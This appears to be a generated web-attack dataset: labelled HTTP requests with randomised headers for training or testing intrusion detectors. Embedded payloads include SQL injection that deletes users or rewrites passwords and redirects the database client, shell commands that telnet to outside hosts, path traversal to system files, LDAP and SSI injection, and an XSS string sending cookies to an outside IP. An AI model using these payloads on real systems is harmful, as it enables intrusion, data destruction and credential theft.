Transfer-Encoding: identity
Upgrade: kfhrs/1.9, veboem/8.5
Warning: 831 www.3uaaedte.jpg "Tszrxr" 
X-Forwarded-For: 209.47.70.154
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37206
Start - Id: 40993
class: SqlInjection
POST /sWA8AmlUMyu0/n5iwng37xete.swf? HTTP/1.0
Content-Length: 210
Content-Language: oaotdea,odci
Content-Encoding: compress
Content-MD5: cXRhaWJwNGRvZGxvYm9uMA==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Sat, 10 Apr 10 04:23:59 UTC
Host: 127.28.131.81
Connection: restd4
Accept: audio/x-wav;q=0.6, application/postscript
Accept-Charset: *;q=0.7
Accept-Encoding: *
Accept-Language: *;q=0.5
Date: Fri, 28 Jan 05 21:03:29 UTC
If-None-Match: *
Authorization: NTLM bG5lYXFheWV0YWZ5dGVpaG1lMHJneHNiYzJzY3duZXdkYXZyZjFubw==
Referer: http://www.htarlos.net/bacieAp/nyemhs/ooidak.mdb
Trailer: If-None-Match
User-Agent: Mozilla/1.7 (Machintosh; U; PPC 8.1; rE-bA; rv:3.9.0) Gecko/75531980
Transfer-Encoding: gzip

rea9aneynsds=sce~iTn&efh6ai7Hkc=exec   xp_regwrite    'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\MSSQLServer\Client\ConnectTo','she7hTis','REG_SZ','DBMSSOCN,hackersip,80'

End - Id: 40993
Start - Id: 42329
class: SqlInjection
GET /mimTSPLb1t.-Ttw.T8yC/i4ja7nnw4nthjrmOlest/Tf5d/eeqtqa/iseu37b/r6p.msf?otaeraO0nw=fSt4&ld0oesser=ihiit9rotaeneunrh&okS4ZBtelnetid=ahUien7ic7&e35ndhsipe1h=134&ezeu=mtekt%27++%29%3B+DELETE+FROM+++users+++++WHERE++upper%28username%29++%3D++upper%28++%27admin&oeludGspoimaloX=eailnHodEtiis&yrPemhETaIf2e=mgxq.b8Tg4&Hhul=721537&rbthmiitfob2c=8347&aTaLxXes=eqTvbqT&eoynif=wcNnlgzlt&cNvDya=aEdxv%3Eio HTTP/1.1
Host: 213.247.67.235:80
Connection: eaenx
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: *
Accept-Language: ecmeslr-teea;q=0.6
Cache-Control: only-if-cached
Client-ip: 64.206.153.107
Cookie: qr8UjtttTsaj=jm1;9idgohevc=?r7alk;rsshoo=|msnsamsDt;M3VZyBGF=rr;y6oieroele=10;hennoedbrm=irtopenhoneo s0
Cookie2: $Version="52"
Date: Thu, 22 Feb 07 12:58:26 UTC
ETag: "_05h89GLjeFPIMmU"
Expect: 100-continue
From: vtsibh@nsti.biz
If-Modified-Since: Sat, 19 Dec 09 02:46:38 CET
If-Unmodified-Since: Thu, 17 Sep 09 10:58:36 UTC
If-Match: "b570d2JRlzPth825x"
If-None-Match: *
If-Range: "gRJfwA@@4WZMrOKl7F"
Max-Forwards: 2769
MIME-Version: 1.1
Pragma: syeoh='eooft'
Proxy-Authorization: aslasl sfwmhi=G8in4aid
Authorization: Basic ZWRhdzpsb2dFaA==
Range: -416,3-,-523324
Referer: http://ltoibdt.st/lnthh3/semnI7.jsp
TE: chunked;q=0.6
Trailer: User-Agent
User-Agent: Mozilla/4.6 (Machintosh; U; Mac OS X 1.3; 1e-io; rv:8.2.8) Gecko/31024183
UA-CPU: MIPS
UA-Disp: 695,8049,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 4371x6437
Via: FTP/1.0 www.t4ofnrp.jpg, FTP/4.3 www.udtw5ort.png, 3.7 www.BboF9dls.css
Transfer-Encoding: ipvwE
Upgrade: roeoon/1.6, etEa/9.2
Warning: 797 57.31.42.175 "ddh8os78iba" "Mon, 22 Aug 05 11:07:24 UTC"
X-Forwarded-For: 47.158.122.16
X-Serial-Number: 807714416153290560
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42329
Start - Id: 36716
class: OsCommanding
GET /yshutdownprocessing-instructionjYGlikeB/h47u-SWf/CVii/pof7ecngpd/abteecImaict8t6s/9s2CWBkhrcp/rpy2.asmx?oaoo=rimgx%5D&1W=%5C%22++++%5C%3B++++%5C%2Fusr%5C%2Fbin%5C%2Ftelnet+++++www.ntororli.com+04378%5C%3B&0sso=64981026&eaabet=Sbinicmdrhtnmeuhms&tFizx=5 HTTP/1.0
Host: 143.194.216.142:338
Connection: osee5
Accept: audio/*
Accept-Charset: iso-8859-2;q=0.9, x-mac-turkish;q=0.0, iso-8859-8-i;q=0.2
Accept-Encoding: compress, gzip;q=0.1
Accept-Language: aea0Tutt-asEo;q=0.8, ygdz-i;q=0.9, cutiyn-saexn;q=0.5, 2e-4, hRhthk4-eet;q=0.4
Cache-Control: ndItonjy=6uf
Client-ip: 229.19.37.169
Cookie: aikkltscOqi=l3P4;neeNioeE6=631;euihgmr7Ecmhie=d(ltihome
Date: Thu, 15 Apr 04 11:17:16 UTC
ETag: "l9Gy9HkIv8mHHdYDo6E"
Expect: 100-continue
From: reotU@rhzuEsnere.it
If-Modified-Since: Sun, 12 Jul 09 11:03:59 GMT
If-Unmodified-Since: Wed, 10 Aug 05 06:21:32 GMT
If-Match: "iVFml@WnD9Z0eePYb"
If-None-Match: "q@eKT@c2uD.OHz8S5"
If-Range: Fri, 28 Aug 09 15:43:19 CET
Max-Forwards: 7
MIME-Version: 6.4
Pragma: no-cache
Authorization: fsimhs oedsio=7eRjsxzv
Range: 36-238879
Referer: /enea.txt
TE: deflate,gzip;q=0.2
User-Agent: i5yAOGuh http://www.aaty9a.org
UA-CPU: 68000
UA-Pixels: 656x0255
Transfer-Encoding: 45a7
X-Forwarded-For: 18.24.168.27

null

End - Id: 36716
Start - Id: 37620
class: LdapInjection
PUT /rAQI54g-/o.wEWWQLPBmfyT8hEc_/tngsa7vh6rywoonoe/7winntlLK-xtermnBbgsound@mocha2/n0band/wshutdownxPCRT9fIeXq3k/9EHta7tpn3gtjeeniW.html? HTTP/1.0
Content-Length: 145
Content-Language: 2ek
Content-Encoding: deflate
Content-Location: http://www.vwio.gov/yieer/8lkeahel.php
Content-MD5: NGVlb29zdXVMdG1pYW5vdA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 06 Apr 10 06:40:26 GMT
Last-Modified: Mon, 09 Nov 09 22:55:35 GMT
Host: 79.71.152.163
Connection: close
Accept: audio/*, text/*;q=0.3
Accept-Charset: windows-1255;q=0.9, x-mac-arabic, iso-2022-kr;q=0.0, euc-jp
Accept-Encoding: *
Accept-Language: ars-bZa;q=0.5, cobeeoa-loloRai, 9on9rn0-J;q=0.7
Cache-Control: no-cache
Client-ip: 109.56.227.8
Cookie: ySdslashnn0h=eoLUs;e4oayecnthkuswe=0398;2wwa=6215565
Cookie2: $Version="0"
Date: Sat, 21 Mar 09 06:16:38 CET
ETag: W/"DddEOWrjiiTyulSVN@"
Expect: 100-continue
From: Isa0nt0@Tiskeey.com
If-Modified-Since: Thu, 02 Dec 04 16:28:40 UTC
If-Unmodified-Since: Wed, 20 Apr 05 23:58:15 GMT
If-Match: "vHrB8Jr0Qpu1@qmn"
If-None-Match: *
If-Range: *
Max-Forwards: 869
MIME-Version: 4.3
Pragma: no-cache
Proxy-Authorization: Digest username="pitaah"
Authorization: Digest opaque="dwnt"
Range: -6153,297-,439-473
Referer: /ccescr4.jsp
TE: deflate;q=0.2,trailers,trailers
Trailer: Accept-Language
User-Agent: eAt4BUeF7V http://www.nhoe.it
UA-CPU: MIPS
UA-Disp: 2548,1743,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 770x317
Via: 1.2 www.tdEnl.tiff
Transfer-Encoding: deflate
Upgrade: KhGnr/5.3, xofo/5.0, aRe/6.6
Warning: 019 53.184.51.92 "gqnaoerdito" 
X-Forwarded-For: 20.191.23.124
X-Serial-Number: 220877773
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

tSinapnn=7258258&pmf=oreo&pUuMD3Wprocessing-instruction7Q=0r&dnwn=hua6ommEciesIebt&fE3rze=sZ5dFY7plR4&aqfbtats=erz)(    |   (ila0n=*)

End - Id: 37620
Start - Id: 46046
class: PathTransversal
GET /vgIk.RveptEwiK5zg0/gxP0JPgBjaNKCZ3.css? HTTP/1.0
Host: 159.231.128.236
Connection: close
Accept: */*;q=0.6
Accept-Encoding: deflate;q=0.9, deflate;q=0.9, gzip;q=0.5
Accept-Language: /etc/passwd
Cache-Control: no-transform
ETag: W/"yB915u6khIqLTLE4O_X"
Expect: f8saieue=irpm;rertrv=AStiptem
If-Modified-Since: Wed, 03 Feb 10 17:52:34 CET
If-Unmodified-Since: Tue, 14 Apr 09 08:33:10 GMT
Max-Forwards: 2
Pragma: rlmH=tTtsEb
Range: 803160-302133,-081717,3615-
Referer: http://www.w4oexrto.de/oamzto/goth/knetlya/ptcrsh0.php
Trailer: Transfer-Encoding
User-Agent: Mozilla/1.2 (X11; U; SunOS sun4u 1.5; eT-aa; rv:6.1.6) Gecko/33859657
UA-OS: Windows NT
Transfer-Encoding: compress

null

End - Id: 46046
Start - Id: 40811
class: SSI
GET /fd7cmfe9xa0sata/sPe/oNP51S/93svd/tXPJKbimgRXzsuTs/5oBy@OperlhPEx3@t.tiff?ysintl=una+%24ecarafe6clHhavingdG&sIueny=ora%27Sn47xm+i&geioc7htrda3e=%25n2iEsedFt&AosoGeek=4kr&loCwinntVdpasswdJ52=ux%3Eadhpunullboo%26&sadpeigeerhet5m=%3C%21--++%23odbc+++++statement%3D+%22select++e9ovems%2C+++++vstee%2C++1o++++from+++etdqprilg+order++++by++7%2C+++++743%2C+++++7%22+++--%3E&r@EH=56&UsystemQXdaA=552352 HTTP/1.0
Host: 67.180.49.170:3
Connection: close
Accept: */*;q=0.1
Accept-Charset: iso-8859-6;q=0.9, x-mac-icelandic;q=0.6, windows-1251, windows-1251;q=0.3, koi8-r
Accept-Encoding: identity, gzip
Accept-Language: *;q=0.5
Cache-Control: max-age=60391
Client-ip: 89.161.138.91
Cookie: ecetaetpgS6=etmpnM;ihreurtfiesoc=5vbscriptgeecho~mamat;SRsk=a4naTl40atv passthru;khtje3em6FszzN8=otu0aNae;zysd=hxa4tutrea
Cookie2: $Version="210"
Date: Fri, 03 Sep 04 14:26:04 GMT
ETag: "V0yqNhaPfiAfr9wMm2IH"
Expect: 100-continue
From: iiljwdi@httr81j.de
If-Modified-Since: Wed, 18 Jan 06 11:58:44 GMT
If-Unmodified-Since: Mon, 27 Aug 07 06:24:13 GMT
If-Match: ".ghuRfE_DK4TffeKu4-n"
If-None-Match: *
If-Range: "Jz@uU_i@G5wY0Wp"
Max-Forwards: 507
MIME-Version: 3.0
Pragma: ektelqv='eana'
Proxy-Authorization: Digest opaque="9des"
Authorization: NTLM bW9haTl0Y2d0eWl1aHphRWMwYnlyRWFsYWdhSGFpbWZobWFv
Range: -4,-190,-803524
Referer: http://www.dspoi.uk/tsmIh.pl
TE: gzip,trailers,chunked;q=0.6
Trailer: Range
User-Agent: Mozilla/7.1 (X11; U; Solaris 1.1; O4-td; rv:8.0.9) Gecko/54825938
UA-CPU: 68000
UA-Disp: 327,318,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 871x928
Via: 7.1 www.v5steer.jpg
Transfer-Encoding: eneaao; tdqip=erSa
Upgrade: t9tt/3.9, 2htSi/0.2, hta3f/5.3
Warning: 985 www.atEa.jpg:824 "esoj" "Tue, 11 Nov 08 09:01:56 UTC"
X-Serial-Number: 17196143235816087076
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40811
Start - Id: 43143
class: OsCommanding
GET /YV/hiipynrseo/nibrm0ko1ostEosE9ta/hkSSwSGulT4SXNS/casrewohhl1zYtwaR2s/t5ah/d6QofXdh9KMQ2cakJEOj/pF2moClikeBPN/EwJwindow.open/aBsaNqln8Sl3tee7emb.gif?ndaercj=prla9sock_streamcltaioc&Meah=%5C%22%5C%3B+++%5C%2Fusr%5C%2Fbin%5C%2Ftelnet+++www.atroisdeitns.com+++79+++++%3B&Gbrtply5iebmt=%3E9Klea%28egr HTTP/1.0
Host: 14.109.201.75
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: no-store
Client-ip: 126.10.165.57
Cookie: mnnHro7=1;seetagllS=iUSZn;soveim=usNi;npyubfl8n=BEpoo5o4adt
Cookie2: $Version="11"
Date: Mon, 27 Dec 04 10:22:29 GMT
ETag: "xp7WlUFTEtl@0cqPOnSz"
Expect: riuusi2e=neiyivtb
From: agaiu@h1the.st
If-Modified-Since: Wed, 27 Oct 04 01:09:11 UTC
If-Unmodified-Since: Sun, 20 Jun 04 05:58:13 UTC
If-Match: *
If-None-Match: *
If-Range: "Dr1UN7YVdxvt-oIEZ_i"
Max-Forwards: 99
MIME-Version: 2.9
Pragma: uTrZriag='bgn'
Proxy-Authorization: qgem2 pmastofe=hwHts
Authorization: Basic UmFGbWVpOmhhYmlBZWg=
Range: 46359-,93372-15,76-
Referer: /Noetoi/iioi7/Aeooeoe.nsf
TE: chunked;q=0.2,gzip;q=0.3
Trailer: Expect
User-Agent: Mozilla/2.2 (Windows; U; WinNT 9.8; iS-ds; rv:8.8.2) Gecko/91224359
UA-CPU: Sparc
UA-Disp: 391,012,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 699x046
Via: 9.4 138.92.104.80:13
Transfer-Encoding: identity
Upgrade: sloat/8.4
Warning: 904 www.jerlys.js "mltO" 
X-Forwarded-For: 1.132.119.183
X-Serial-Number: 197146981100118
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43143
Start - Id: 45601
class: PathTransversal
GET /sU-/Y-mdxhscriptyy/oY2SeHimgI8deletewte/n2VTn/pshbo9srg.cgi?1t=..%5C..%5C..%5C..%5CWINNT%5Csystem.ini&o2AjKDsO=1cgzadi5mhstdin&nn=+br%3Czfse&t8hog=6LeA&at6Fknh=8160&eohtwelciphpojl=2872&i8rtlt=eBriO-sMrjqp HTTP/1.1
Host: www.nqgb.ch
Connection: close
Accept: */*
Accept-Charset: x-mac-roman;q=0.5, x-mac-turkish, windows-1257;q=0.3, x-mac-roman;q=0.0
Accept-Encoding: gzip, gzip
Accept-Language: d-w5erinfg;q=0.7
Cache-Control: only-if-cached
Client-ip: 2.178.204.132
Cookie: qUPA4F4var9HvJ=acs2awherehg9n1t;rwedc5f=38;opwae=Utahoeta  6z;2Tt6tedmtsmaa=137
Cookie2: $Version="7"
Date: Sun, 05 Jul 09 04:38:20 CET
ETag: W/"A4SSBwZMlSj3m58HF"
Expect: iVjhs
From: f4re3ea2@HiNl.uk
If-Modified-Since: Mon, 07 Feb 05 09:09:27 UTC
If-Unmodified-Since: Mon, 16 Nov 09 24:45:10 UTC
If-Match: "5rbpVrWJbc3L6sdV"
If-None-Match: "tIp05M.7R5.ZKjsc8_"
If-Range: "xQdnmr.Vnf8b.1gb"
Max-Forwards: 02
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: ench vu6n=5eeTe
Authorization: Digest uri=http://Zlteonts.biz/baoont0/waas/rwbcMe/coeqI.pdf
Range: -709
Referer: http://www.Rjiaw.biz/faha.mpg
TE: gzip;q=0.9,trailers,gzip
Trailer: Accept
User-Agent: oOfcuesal (r.T9_Sf; aP74n8)
UA-CPU: 68000
UA-Disp: 6050,986,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 413x730
Via: HTTP/9.9 225.128.225.220:14234, HTTP/9.7 244.119.104.101, HTTP/9.9 127.83.77.16
Transfer-Encoding: deflate
Upgrade: m9e/5.3, eSsw5l/3.4, Vct7rc/0.1, hEwtE/6.8
Warning: 283 170.214.194.99 "oochsm" "Thu, 12 Feb 09 16:17:19 CET"
X-Forwarded-For: 204.138.194.99
X-Serial-Number: 079212958544590509
----: -----------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 45601
Start - Id: 41426
class: SqlInjection
PUT /i3fcnEsng/6Iog5/-p/oy/bO-TBM3/uaehwaaratEtofd/ojo58X9Ss1/t@OWAU/dneeFlsriz1sirc/cosat2.jpg? HTTP/1.0
Content-Length: 226
Content-Language: ihw,aorbdnT,ondityOh
Content-Encoding: compress
Content-Location: http://iA8Usr.com/snenw5/Ql6edi/ctentA.exe
Content-MD5: YmRubnJ3NXJhcmlvbWE3cg==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 08 Feb 10 12:44:36 UTC
Last-Modified: Fri, 06 May 05 01:31:45 UTC
Host: www.83eteqnnei.fr:80
Connection: close
Accept: */*;q=0.1
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: rlqd=uo
Client-ip: 196.36.129.201
Cookie: _bgsoundokw=5039
Cookie2: $Version="458"
Date: Wed, 04 Jun 08 21:47:15 GMT
ETag: W/"4aBq-mQ1_DiT7vYxf"
Expect: enoavte1=egee
From: hbituu@nl5IshaU.be
If-Modified-Since: Sat, 25 Sep 04 10:48:35 UTC
If-Unmodified-Since: Thu, 10 Dec 09 15:18:41 UTC
If-Match: "5IybfPEmxv5zbuKfR71V"
If-None-Match: *
If-Range: "nhfYEa5epnA9YaC"
Max-Forwards: 7224
MIME-Version: 2.2
Pragma: rfnj9='q'
Proxy-Authorization: Digest qop=ymsaBhdy
Authorization: Digest response="81F678b71Cec7e540dBdF0573EaC9FC0"
Range: -86
Referer: http://ujeped7y.be/neei/toniI/ihwoe.js
TE: trailers
Trailer: Date
User-Agent: Mozilla/3.7 (Machintosh; U; PPC 3.9; ea-aj; rv:6.1.1) Gecko/79049117
UA-CPU: MIPS
UA-Disp: 0773,9723,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 738x118
Via: 0.7 www.aT8ca4ri.htm
Transfer-Encoding: atams; eeonr=i4etmno
Upgrade: rht/5.4
Warning: 367 www.allm.jpg "DIddrxa" "Wed, 23 Jun 04 20:22:35 UTC"
X-Forwarded-For: 47.63.17.194
X-Serial-Number: 9168693821015244526
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

fotpu7n1u0req=nSpghF7xH21C&7roxthoeeemnh=;alter  table larosenans  set     password  =    'rcre'   where  name    =     'eit7r';&V_zj6RI0usr5=3hlt&hp=6dzne&etthi2iu=esulsb7eul&hld6bis=RepositionTn$8areoptaoug

End - Id: 41426
Start - Id: 36920
class: LdapInjection
PUT /jnhaondn/sofapuWw1996ewoN/sztbmqlGp8UagsozL1o/osel/640/aZKscript/nntaa7.mspx? HTTP/1.0
Content-Length: 185
Content-Language: r8c5mls,aaz,cvtEerYp
Content-Encoding: compress
Content-Location: http://www.Fasuoe.ch/enhc/6oi2ni.msf
Content-MD5: aWVhdXd6bWRldDdvaW9jZA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 19 Sep 05 18:44:20 GMT
Last-Modified: Fri, 04 Dec 09 11:32:05 UTC
Host: www.oerneih8iI.cz:49108
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-korean;q=0.2
Accept-Encoding: 
Accept-Language: r6-Sax;q=0.3, O4peegs-e;q=0.1, sHute8-8s, 8aySkeK-r;q=0.8
Cache-Control: only-if-cached
Client-ip: 23.24.154.22
Cookie: DPSLaB5=410052;NnWF_.=oe 7Ivbscript;aitetrtNIsnt=34132461;isfesqsi2xt=ogl;LmqbetweenBh3vhomecopy5=1577184;keeidsst9ornda=nIWB
Cookie2: $Version="09"
Date: Sun, 03 Aug 08 13:40:49 GMT
ETag: W/"0L.4aloC.Or7bHua.kg-"
Expect: 100-continue
From: dhafadn@folsiatle.com
If-Modified-Since: Fri, 01 Dec 06 22:26:15 CET
If-Unmodified-Since: Fri, 17 Nov 06 08:17:43 GMT
If-Match: "SqEw28g1znnBLeF4MU"
If-None-Match: "Qj_@WAhd4eNjgvH3S"
If-Range: Fri, 14 Mar 08 10:30:46 GMT
Max-Forwards: 1
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: NTLM cmVlZXRyZWdpYWJlb3N0ZUFPdGd6bm85Ym5jbndpdG5jc2Vxc2J1YVNlcg==
Authorization: Digest algorithm=MD5-sess
Range: 03-
Referer: /nhveeur/hctsairg/koh8Itm/diupo3/uispms.doc
TE: trailers,gzip;q=0.5
Trailer: Accept
User-Agent: 2lkjtf64Tobs
UA-CPU: Sparc
UA-Disp: 0609,6015,16
UA-OS: Win98
UA-Pixels: 015x0585
Via: 3.0 128.168.94.165, FTP/6.3 138.250.39.41
Transfer-Encoding: ee2rk; htob=iukHndq
Upgrade: i66/6.1
Warning: 029 17.241.6.13:76 "8tya4sneebfR" "Fri, 14 Mar 08 05:58:01 GMT"
X-Forwarded-For: 189.182.231.41
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

heg=3s&vpetfE7sr6Ueete=94&YDn.KRXh=")(targetfilter=(o=NetscapeRoot))&fidtsnrZet=c-wherenimgc ong&cn9huasdtEmr=a&wZ6includesystem=477&bu9dsiu=husajrwrmishiAymd&rminnm=d4g

End - Id: 36920
Start - Id: 39129
class: SSI
GET /bpm4TPXpqrB-/e.nVIyZE@4n/azIxU3j.cfm? HTTP/1.0
Host: www.h4hi.de
Connection: close
Accept: application/x-tar, application/x-tar, image/*
Accept-Charset: iso-8859-6;q=0.9, ks_c_5601-1987;q=0.8, koi8-r
Accept-Encoding: 
Accept-Language: <!--#email fromhost="www.tcn9hnp.com" tohost="mailbox.td1ne.com" message="rIlr0 mhehhS yYa y4T" fromaddress="n43s.com" toaddress="5y1.eflja.com" subject="2l" sender="tite.com" replyto="4wwoui.com" cc="usaT" inreplyto="rtvml Ooqc hzoks" id="iomail" -->
Cache-Control: max-stale=24
Date: Sat, 03 Dec 05 14:34:50 UTC
Expect: 100-continue
If-Modified-Since: Thu, 03 Jan 08 19:55:25 CET
If-Unmodified-Since: Tue, 25 Aug 09 11:34:30 GMT
If-Range: *
Max-Forwards: 3
Pragma: no-cache
Authorization: ilbt axdniuwN=ahyii5i
Referer: http://celh.be/c2Ua4s.mp3
TE: trailers,gzip
User-Agent: Mozilla/7.4 (X11; U; SunOS sun4u 1.4; ir-nt; rv:6.1.4) Gecko/48703692
UA-OS: Solaris
Transfer-Encoding: deflate
Warning: 916 61.218.175.24 "ikdu2jtran8N" 
X-Forwarded-For: 216.246.247.139
~~~~~: ~~~~~~~~~~~~

null

End - Id: 39129
Start - Id: 46857
class: XSS
POST /rn0eWb/eoisa6gasolsn2ra/3no7r9gnsarxd/tsNwoNwnn/8n6rAomoh2er/F6Enshutdowng1samen/9nuSyrsa34teme/iq/c1o@sYNc.cgi? HTTP/1.0
Content-Length: 276
Content-Language: erc,u2
Content-Encoding: gzip
Content-Location: http://11o2arlu.uk/Iwnbkud/asaeE.tiff
Content-MD5: aGRoY3cxZXNVRWJlaW9yYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 18 Jul 06 08:10:49 GMT
Last-Modified: Thu, 14 Apr 05 17:03:15 CET
Host: 174.58.18.198
Connection: keep-alive
Accept: */*
Accept-Charset: gb2312, ks_c_5601-1987;q=0.6, euc-jp;q=0.8
Accept-Encoding: *;q=0.9
Accept-Language: zUm-aald, naonr-Pdu, ahomyt0i-rauOsEi
Cache-Control: wrTe='3ou9'
Client-ip: 213.98.235.52
Cookie: i8whe=9262271130;rhttqp8ekioiii=909946;ia3auhsEt=3tTs4 
Cookie2: $Version="134"
Date: Mon, 21 Apr 08 18:14:48 GMT
ETag: "HTJvF.2qTzNngibZ14mg"
Expect: mnxeruiu=mhesipte
From: eisopAa@s6qldnnaej.be
If-Modified-Since: Sun, 03 May 09 20:25:55 CET
If-Unmodified-Since: Thu, 25 Mar 10 22:18:32 CET
If-Match: *
If-None-Match: "Jl@GS3jH1ob.mO9Eauy8"
If-Range: Tue, 18 Aug 09 04:58:36 CET
Max-Forwards: 82
MIME-Version: 2.6
Pragma: khw=tsIeg
Proxy-Authorization: Basic Z2lleDplZHNvZHc=
Authorization: 30Mi x2Ljsisl=rnolxb
Range: 11334-,-933
Referer: http://iqteJ.de/sdJe/pRmSh/Dnoeeac/tonmsg.mpeg
TE: gzip,trailers
Trailer: Referer
User-Agent: Mozilla/4.9 (Windows; U; Windows NT 4.2; mv-aE; rv:6.3.2) Gecko/76862062
UA-CPU: x86
UA-Disp: 457,6373,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 758x384
Via: 8.4 108.98.40.193, 9tei25/4.2 95.32.248.29:3614
Transfer-Encoding: gzip
Upgrade: ccSen/7.1
Warning: 762 95.205.191.87 "fohr1e" "Mon, 03 Aug 09 24:53:41 UTC"
X-Forwarded-For: 67.114.213.31
X-Serial-Number: 93268691782079750245
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

MPMRvarjI.=atLunionencadcd&rdgahs2tRlndyn=73&K.ZefP=huesMAexwaessienae&3Eon2beoeorIn=<meta     http-equiv    =  " refresh   "  content    =  "0;url=javascript: [window.open('http://206.32.154.252/eretto.mdb'+document.cookie);]"  >

End - Id: 46857
Start - Id: 38131
class: LdapInjection
GET /bhboowRd/i0p/eabwe/mJrb/htioutao/iV/7p@J_FXDY/ezyvrrronenhEmrzqhet/mf@vT4LXC/qCBzgd6o7pgs/oKAiFS43Dm_M_SsgK1X.js?tKe4iny9td=+&nweoRene7=eeyg%3B84arr%2Fnatao&annilrtp6=0Edrop%7Cd9En&sweOpAg=573&Ac=aywa&YRVIJ855T=aXte0oloodyw9wesl&fwa=rmiph%29%28+%7C++%28Oess%3D*%29&fttuyk=7797&X-xZperlM=lve&giseadgsuxA=sBxc8V9OFbx&9Jfv5=lCb7&lzoa0ocLoes=RsMbAsservicesAic6jwwnmm+it&Rm0=922 HTTP/1.0
Host: 184.47.248.60
Connection: keep-alive
Accept: text/html
Accept-Charset: euc-cn;q=0.8
Accept-Encoding: compress, deflate, gzip, gzip, identity;q=0.5
Accept-Language: enuhi-eESesb;q=0.1, axNh-huionn;q=0.7, hdgeh-5Ts, jl-iarp
Cache-Control: no-cache
Client-ip: 16.136.95.209
Cookie: e6ei=bhtpass;hwdeecmieyoxR=[fe-euaah\lkstdins'tt n;ghsdfhqdd=linkyv;ueoreary=8;k-DR0W-=uasystem-( lh2mfecj;aylfielfsu=having84
Cookie2: $Version="5"
Date: Thu, 10 Dec 09 17:50:01 CET
ETag: "jlkQ0MQA5rNMiFyyVN"
Expect: 100-continue
From: ttste@rra4euq0.de
If-Modified-Since: Fri, 19 Aug 05 15:06:00 GMT
If-Unmodified-Since: Sat, 12 Jul 08 04:44:13 GMT
If-Match: *
If-None-Match: "fzS1T2Fqy8lTDSXiaj@"
If-Range: Wed, 17 Aug 05 14:09:18 CET
Max-Forwards: 62
MIME-Version: 0.5
Pragma: ub8rreh=swt8a
Proxy-Authorization: sz68gt ghfnil=auo57ahx
Authorization: Basic c29vb3B0OkVlbGUwaFA=
Range: 17768-5
Referer: http://hD9Ob.com/yLro.tiff
TE: trailers,trailers,gzip;q=0.3
Trailer: From
User-Agent: hersora/2.3.2.6
UA-CPU: 68000
UA-Disp: 072,9161,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 9991x6291
Via: FTP/0.3 46.37.149.19
Transfer-Encoding: compress
Upgrade: gsce/8.8, osc/5.9, loe/5.9, ect/1.6, 1xRehs/4.9
Warning: 366 www.6avznm.css "eearjixe6Beiacditlp" "Sat, 13 Jan 07 06:18:43 UTC"
X-Forwarded-For: 106.193.146.221
X-Serial-Number: 276586158043
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38131
Start - Id: 37713
class: LdapInjection
POST /gPb/tG@/8IincludetWN4qNY-vN7/jeonaxMB/0uIexdrpMsakonMneys7/LXVUYewg1gvbscript/o53CrCf.htm? HTTP/1.0
Content-Length: 228
Content-Language: zah,itesd0
Content-Encoding: compress
Content-Location: http://www.eHwo0pIe.cz/cefu/iPamhzy/jeortee.txt
Content-MD5: cjluNjhzb3RoZXR0ZHJzcw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 26 Feb 07 05:51:42 UTC
Last-Modified: Tue, 29 Sep 09 04:35:16 GMT
Host: www.p3oxlata38.net:0
Connection: isi9si
Accept: video/*;q=0.5, text/*
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: e-su, octh-nuoenzh, Dmtb-eot, ee-oocuT, br-6eni1y
Cache-Control: only-if-cached
Client-ip: 34.15.76.194
Cookie: acpleypatdmhs=827129220;n5esnbiaedrieit=619;r7wcit=eWMR6;escle5Et2lws=e?@copyahhaL@hnuando-;li=glrhgte8vaucoteen;qTstdinkePJ5=oSupkU0n@j
Cookie2: $Version="321"
Date: Thu, 08 May 08 05:34:25 UTC
ETag: W/"Cs9xygawlnPcuJ3Z1I"
Expect: 100-continue
If-Modified-Since: Wed, 25 Oct 06 05:51:16 UTC
If-Unmodified-Since: Mon, 04 Oct 04 15:56:13 UTC
If-Match: "gYAAsNsvRjUtupT"
If-None-Match: "iWbkGij.vSxm----w"
If-Range: *
Max-Forwards: 8
Pragma: no-cache
Authorization: NTLM U2VhdWVyZUFuc21laG5pZWFwMXd5aGVleWNvY3JhQWVlbWxTdA==
Referer: /caafsken.shtml
TE: trailers,trailers
Trailer: Connection
User-Agent: nOe.cvAJ http://www.xmd5.cz
UA-CPU: MIPS
UA-Disp: 999,847,16
UA-Color: color16
